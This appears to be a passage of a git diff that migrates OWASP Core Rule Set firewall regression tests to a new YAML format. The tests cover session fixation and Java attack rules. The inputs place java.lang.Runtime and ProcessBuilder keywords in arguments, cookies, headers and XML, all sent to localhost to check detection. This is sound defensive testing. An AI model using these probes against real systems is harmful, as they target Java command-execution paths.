zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + no_expect_ids: [943110] diff --git a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index 9350814..33a8746 100644 --- a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,27 +1,25 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943120.yaml +rule_id: 943120 tests: - - test_title: 943120-1 + - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943120" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943120] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 9cbf3d2..89a8f75 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,27 +1,25 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944000.yaml" - description: "Description" +rule_id: 944000 tests: - - test_title: 944000-1 + - test_id: 1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - uri: "/post" - data: "test=value" - output: - no_log_contains: "id \"944000\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + uri: "/post" + data: "test=value" + output: + log: + no_expect_ids: [944000] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 8070503..c1a60d1 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944100.yaml" - description: "Description" +rule_id: 944100 tests: - - test_title: 944100-1 + - test_id: 1 desc: Argument test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - test_title: 944100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] + - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944100] + - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944100] + - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index ca0eef8..7cf19d1 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944110.yaml" - description: "Description" +rule_id: 944110 tests: - - test_title: 944110-1 + - test_id: 1 desc: Argument test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 2 desc: Argument test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - test_title: 944110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log: + expect_ids: [944110] + - test_id: 3 desc: Argument name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log: + expect_ids: [944110] + - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log: + expect_ids: [944110] + - test_id: 5 desc: Cookie test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 6 desc: Cookie test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 7 desc: Cookie name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-8 + - input: + dest_addr: "127.0.0.1" + port: 